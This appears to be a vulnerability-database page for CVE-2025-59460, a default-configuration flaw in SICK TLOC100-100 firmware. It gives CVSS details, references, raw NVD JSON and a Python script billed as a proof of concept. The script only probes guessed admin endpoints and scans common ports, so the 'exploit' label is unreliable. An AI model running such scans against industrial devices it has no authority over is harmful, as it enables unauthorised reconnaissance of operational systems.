CVE-2025-59460

Description

The system is deployed in its default state, with configuration settings that do not comply with the latest best practices for restricting access. This increases the risk of unauthorised connections.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tloc100-100_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sick:tloc100-100:-:*:*:*:*:*:*:* - NOT VULNERABLE

SICK工业自动化产品 - 使用默认出厂配置的所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59460 PoC - SICK Device Default Configuration Exploitation
# Target: SICK industrial automation devices with default configuration
# Author: Security Research
# Date: 2025-10-27

import requests
import sys
import socket
from urllib.parse import urljoin

def check_vulnerability(target_ip, target_port=80):
    """
    Check if target SICK device is vulnerable to CVE-2025-59460
    Tests for unauthorized access due to default configuration
    """
    print(f"[*] Scanning target: {target_ip}:{target_port}")
    
    # Test 1: Check if web interface is accessible without authentication
    try:
        url = f"http://{target_ip}:{target_port}/"
        response = requests.get(url, timeout=10, verify=False)
        print(f"[+] Web interface accessible: {response.status_code}")
        
        # Test 2: Attempt to access sensitive endpoints
        sensitive_endpoints = [
            "/config",
            "/status",
            "/api/system/info",
            "/admin/settings"
        ]
        
        for endpoint in sensitive_endpoints:
            try:
                resp = requests.get(urljoin(url, endpoint), timeout=5)
                if resp.status_code == 200:
                    print(f"[!] Potential unauthorized access: {endpoint}")
            except:
                pass
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
    
    # Test 3: Check for open ports commonly exploited
    common_ports = [80, 443, 8080, 8443, 22, 502]
    print("\n[*] Scanning common ports...")
    for port in common_ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)
        result = sock.connect_ex((target_ip, port))
        if result == 0:
            print(f"[+] Port {port} is open")
        sock.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-59460_poc.py <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    check_vulnerability(target, port)
    print("\n[*] PoC execution completed. Review results for CVE-2025-59460 vulnerability.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59460
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59460
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59460/
[4] VulDB https://vuldb.com/cve/CVE-2025-59460
[5] https://sick.com/psirt
[6] https://www.cisa.gov/resources-tools/resources/ics-recommended-practices
[7] https://www.first.org/cvss/calculator/3.1
[8] https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0013.json
[9] https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0013.pdf
[10] https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59460", "sourceIdentifier": "[email protected]", "published": "2025-10-27T11:15:40.743", "lastModified": "2025-11-03T19:42:07.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The system is deployed in its default state, with configuration settings that do not comply with the latest best practices for restricting access. This increases the risk of unauthorised connections."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1391"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tloc100-100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.1", "matchCriteriaId": "D6A0DB5E-E209-451C-AB27-A9F924D98C48"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tloc100-100:-:*:*:*:*:*:*:*", "matchCriteriaId": "224B60BD-6A7D-410A-A72E-18D0E669A39C"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0013.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0013.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}